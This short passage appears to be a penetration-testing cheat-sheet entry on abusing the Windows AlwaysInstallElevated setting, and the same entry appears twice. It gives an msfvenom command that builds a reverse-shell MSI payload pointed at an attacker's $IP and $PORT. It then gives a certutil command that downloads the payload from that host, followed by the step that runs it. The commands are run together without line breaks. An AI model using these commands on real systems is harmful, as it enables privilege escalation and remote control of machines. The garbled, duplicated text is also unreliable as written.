AlwaysInstallElevated
If on, just need to make malicious msi and install
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$IP LPORT=$PORT -f msi > exp.mscertutil -urlcache -split -f http://$IP/exp.msi exp.msi.\exp.msiLast updated
If on, just need to make malicious msi and install
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$IP LPORT=$PORT -f msi > exp.mscertutil -urlcache -split -f http://$IP/exp.msi exp.msi.\exp.msiLast updated